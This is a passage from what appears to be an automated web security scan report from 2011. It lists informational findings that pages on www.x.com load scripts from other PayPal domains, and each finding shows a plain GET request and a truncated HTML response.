...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.125. https://www.x.com/docs/DOC-1551  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1551

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1551 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313535313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333335313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335343b3130322c333335353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:03 GMT; Path=/
Vary: User-Agent
JP: D=196106 t=1313157243446476
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.126. https://www.x.com/docs/DOC-1613  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1613

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1613 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=254809 t=1313157226947806
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.127. https://www.x.com/docs/DOC-2241  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.128. https://www.x.com/docs/DOC-2346  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2346

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-2346 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323334363b3130322c313433313b3130322c313130363b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:11 GMT; Path=/
Vary: User-Agent
JP: D=90261 t=1313157251251583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.129. https://www.x.com/docs/DOC-3201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3201

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3201 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333230313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333332323b3130322c313535313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333335343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:04 GMT; Path=/
Vary: User-Agent
JP: D=167625 t=1313157243865563
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.130. https://www.x.com/docs/DOC-3212  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3212

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3212 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337343b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=98683 t=1313157237758028
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.131. https://www.x.com/docs/DOC-3251  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3251

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3251 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333235313b3130322c333432373b3130322c333337353b3130322c333432363b3130322c333433313b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:55 GMT; Path=/
Vary: User-Agent
JP: D=152122 t=1313157235677820
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.132. https://www.x.com/docs/DOC-3271  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3271

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3271 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333237313b3130322c333335333b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=202196 t=1313157242055016
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.133. https://www.x.com/docs/DOC-3321  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3321

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3321 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b3130322c333231323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=175031 t=1313157241647991
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.134. https://www.x.com/docs/DOC-3322  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3322

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3322 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332323b3130322c333335313b3130322c333335353b3130322c333335323b3130322c333335343b3130322c333335333b3130322c333334353b3130322c333332333b3130322c333231323b3130322c333337313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=109738 t=1313157241231678
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.135. https://www.x.com/docs/DOC-3323  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3323

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3323 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337343b3130322c333337323b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=133918 t=1313157238141945
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.136. https://www.x.com/docs/DOC-3345  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3345

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3345 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333334353b3130322c333337313b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333332333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=125907 t=1313157238612169
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.137. https://www.x.com/docs/DOC-3351  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3351

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3351 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333334353b3130322c333335343b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=138250 t=1313157240721784
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.138. https://www.x.com/docs/DOC-3352  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3352

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3352 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335323b3130322c333335333b3130322c333332333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=134617 t=1313157240348745
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.139. https://www.x.com/docs/DOC-3353  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3353

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3353 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=99945 t=1313157239993132
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.140. https://www.x.com/docs/DOC-3354  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3354

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335343b3130322c333335353b3130322c333337313b3130322c333332333b3130322c333334353b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=125676 t=1313157239533114
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.141. https://www.x.com/docs/DOC-3355  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3355

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3355 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335353b3130322c333334353b3130322c333231323b3130322c333332333b3130322c333337313b3130322c333337333b3130322c333337323b3130322c333337343b3130322c333235313b3130322c333337353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=160248 t=1313157238946488
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
